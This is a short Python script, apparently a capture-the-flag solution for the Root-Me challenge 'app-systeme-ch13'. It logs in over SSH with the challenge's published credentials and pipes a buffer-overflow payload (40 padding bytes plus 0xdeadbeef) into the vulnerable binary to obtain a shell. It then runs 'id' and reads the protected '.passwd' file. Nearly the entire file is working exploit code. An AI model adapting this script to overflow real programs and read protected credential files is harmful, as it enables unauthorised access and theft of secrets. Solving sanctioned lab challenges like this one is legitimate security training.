51 lines
1.3 KiB
Python
51 lines
1.3 KiB
Python
#!/usr/bin/env python3
|
|
import time
|
|
|
|
import paramiko
|
|
|
|
HOST = "challenge02.root-me.org"
|
|
PORT = 2222
|
|
USER = "app-systeme-ch13"
|
|
PASSWORD = "app-systeme-ch13"
|
|
|
|
|
|
def drain(channel: paramiko.Channel, loops: int = 20, delay: float = 0.2) -> str:
|
|
chunks = []
|
|
for _ in range(loops):
|
|
time.sleep(delay)
|
|
while channel.recv_ready():
|
|
chunks.append(channel.recv(65535).decode("utf-8", errors="replace"))
|
|
return "".join(chunks)
|
|
|
|
|
|
def run() -> None:
|
|
client = paramiko.SSHClient()
|
|
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
client.connect(
|
|
hostname=HOST, port=PORT, username=USER, password=PASSWORD, timeout=15
|
|
)
|
|
try:
|
|
shell = client.invoke_shell()
|
|
banner = drain(shell, loops=10)
|
|
if banner:
|
|
print(banner, end="")
|
|
|
|
exploit = (
|
|
'(python3 -c "import sys; '
|
|
"sys.stdout.buffer.write(b'A'*40+b'\\xef\\xbe\\xad\\xde')\"; "
|
|
"cat) | ./ch13\n"
|
|
)
|
|
shell.send(exploit.encode())
|
|
print(drain(shell, loops=12), end="")
|
|
|
|
shell.send(b"id\n")
|
|
shell.send(b"cat .passwd\n")
|
|
shell.send(b"exit\n")
|
|
print(drain(shell, loops=20), end="")
|
|
finally:
|
|
client.close()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
run()
|